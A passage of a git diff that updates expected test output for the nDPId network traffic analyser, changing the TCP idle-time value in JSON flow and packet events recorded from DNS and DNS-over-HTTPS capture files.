00618{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1560869916459,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":106,"pkt_l4_len":52,"thread_ts_msec":1560869916459,"pkt":"CFsOoYNeAAwpfKTLht1gAxE1ADQRQCABBHAfCxawAgwp\/\/58pMsmBkcARwAAAAAAAAAAABER1T4ANQA07tzo3wEAAAEAAAAAAAEDbnMyCHdlYmVyZG5zAmRlAAABAAEAACkCAAAAAAAAAA=="} 
00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916459,"flow_last_seen":1560869916459,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1560869916459,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1560869916473,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":122,"pkt_l4_len":68,"thread_ts_msec":1560869916473,"pkt":"AAwpfKTLCFsOoYNeht1gCEAKAEQRPCYGRwBHAAAAAAAAAAAAEREgAQRwHwsWsAIMKf\/+fKTLADXVPgBEGsro34GAAAEAAQAAAAEDbnMyCHdlYmVyZG5zAmRlAAABAAHADAABAAEAAA4QAATC9wUOAAApBawAAAAAAAA="} 00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916473,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ns2.weberdns.de","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"194.247.5.14"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916474,"flow_last_seen":1560869916474,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869916474,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1560869916474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916474,"pkt":"AAwpYjEqAAwpfKTLCABFAAA8zqNAAEAG3BXC9wUGwvcFDphdADXWgnc5AAAAAKACchCQMQAAAgQFtAQCCAox8fNRAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916475,"pkt":"AAwpfKTLAAwpYjEqCABFAAA8AABAAEAGqrnC9wUOwvcFBgA1mF3frqtz1oJ3OqAScSDR+QAAAgQFtAQCCAqVd0imMfHzUQEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1560869916475,"pkt":"AAwpYjEqAAwpfKTLCABFAAA0zqRAAEAG3BzC9wUGwvcFDphdADXWgnc6366rdIAQAOWQKQAAAQEICjHx81GVd0im"} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1560869916474,"flow_last_seen":1560869916474,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1560869916474,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1560869916474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916474,"pkt":"AAwpYjEqAAwpfKTLCABFAAA8zqNAAEAG3BXC9wUGwvcFDphdADXWgnc5AAAAAKACchCQMQAAAgQFtAQCCAox8fNRAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1560869916475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1560869916475,"pkt":"AAwpfKTLAAwpYjEqCABFAAA8AABAAEAGqrnC9wUOwvcFBgA1mF3frqtz1oJ3OqAScSDR+QAAAgQFtAQCCAqVd0imMfHzUQEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1560869916475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1560869916475,"pkt":"AAwpYjEqAAwpfKTLCABFAAA0zqRAAEAG3BzC9wUGwvcFDphdADXWgnc6366rdIAQAOWQKQAAAQEICjHx81GVd0im"} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869916474,"flow_last_seen":1560869916477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869916474,"flow_last_seen":1560869916477,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869886413,"flow_last_seen":1560869886443,"flow_idle_time":180000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -144,7 +144,7 @@ 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869913753,"flow_last_seen":1560869913756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869913753,"flow_last_seen":1560869913756,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","packets-captured":66,"packets-processed":59,"total-skipped-flows":0,"total-l4-data-len":17861,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":21,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":148,"global_ts_msec":1560869916477} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 66/59 diff --git a/test/results/dnscrypt-v2-doh.pcap.out b/test/results/dnscrypt-v2-doh.pcap.out index 9ad95e3b1..8a7b80c9a 100644 --- a/test/results/dnscrypt-v2-doh.pcap.out +++ b/test/results/dnscrypt-v2-doh.pcap.out 
@@ -1,245 +1,245 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946739298533} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946739298533,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739298533,"pkt":"REREREREZmZmZmZmCABFAAFD4UdAAL0GsQQKAAABi2PeSNGqAbt5f9qX6vvArlAYAfYrngAAFgMBARYBAAESAwPY4R+kmwrmRkwkOvmL20MZvvmmXV\/QYaA6X4C5e+GFvyA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLTIuc2VieS5pbwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACA0hS9OEA\/J5twwMByNtSlpgrCPJW9Ooqwd+S9NxEdaCw=="} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739298533,"flow_last_seen":946739298533,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739298533,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":53674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh-2.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02379{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946739298797,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739298797,"pkt":"ZmZmZmZmRERERERECABFAAWq1TBAACsGSrWLY95ICgAAAQG70arq+8CueX\/bslAQAfmvXQAAFgMDAHoCAAB2AwOWvrm4FPC7V7PYuN+Lshod\/nezEzfqc01CK\/K8f2FrjCA2SDuI+F1GOq7qyiEw+aePhhElQVpDVzMYXSdiyok3WRMBAAAuACsAAgMEADMAJAAdACDl61zVHhMWB0BdL3ddlBFKSw5Lr9HVe6EkVLOcYVLAAxQDAwABARcDAwAksgraFQq8T84jfrRmYc223NGnVGbYG\/xj8xk4v\/EJCHm3s9w1FwMDCVmg97DgSdnn53nb0jGLv9F1+4VVO1DlJvFZ4CsfAqRyJ8a0jMqAaeRjhyCNwiDpU+6mevWKgpxWfYNjWShazkI7oaAh0ocoGs0\/Z2Mwn5ZIkIv+OuDwieAM9qTwhi+fGVM4H+qU8v3e8TtrqoxC+IgZVc8V3I+\/yPEjroPH33YYxxjju5aqvElJCjEI4urJQzXoWsAq6uQKccy5WfzKSDhJNZ8AVPquU8SpWKmo\/\/E2qD+dKLWJFgaub29gXMXjQTVzoJxdvVKG52mcWm6EXETLAVeqYVAn1jxtrmpkg13Vk85sRN2hjK5eeu4ap8rf7Lodf5tfmhv8SVfULmdGCNmmvgZMJkjmNfdKrw+XnrBHNQP2GC7kgKzhx++y9Ur+7CtcaZ0Stuv2mMWKbTn30OOZzAWiYjVeWw1PNj6IPMesZYC3bO1PwS8+BOlQEPumskRErqRklUuVJ1OXsXJn8o9P7B9r5RxumsKPZbrYuGjTJfVUwTIwaAH4g\/GODGK2+B5YB\/Z\/6LysjXxF0obthFSDlDUGBTCdDZdGFQyyl8u0xri2sr4xv5TWFpIjmyYys6SXqhW7QRXi8cM\/fGE\/JM+qZpyddar8bHdCLxGlvvPz4eCxh6lg0sugzb6K+mUo6W7gtEoQaKMIAakeMy2FOKQ3NMe5\/F+3b43gHog099YK8NKs2bvSG\/W7LXyo8PnUinj+AVLnzhrSe+qvDBw9a\/Jp7AkHbVoQwt\/EIF5\/d5w+4KMlJPMSzCUov8rfi\/CCF\/iVjvModtxk+gLz4pUaK3XRZHYtLxfH7FHcLizTZ3sSU4i+tweqvPEyxXE1E7Y+KMLDCV+QkbWkWi9gMec8ZJ3GBnIg+iSrehGCt8i8t7Lu9Wc\/2fGKgQfE9jJe\/fDA2odknuy5GV2960tQvEZAXB0c5GJBhjiPYJgYdgJ2fzUt\/xLgBoWg0zKHa\/soHWqBrLympLp+VepVMyzuzIJ6QgGVTCC1EFSrrSUxkNXDsBrwmyRP\/9FLF9pdzZACXTb6S8myrZazmvEdGdk04PjNhUiHGlUT03OYvmagf8Ya\/4VRzGGdV43OAGkQYeu0ZY\/heh9h7fucuCFB8CyBx4wy7OhYHBnDOYz2gdf\/z49N039rzJarMWXOwbROgeoXzcsBH8Uj6StZMCbM\/ZBGWByfEjHDl5w8E1dbyJx5XuC65RezHZrv05dJlBbVSEsHIMbDl7IWOUdhpeDNskZrQ+GdU5boLCtHmvrbs62KT\/zlJm2mOApHTvifRv
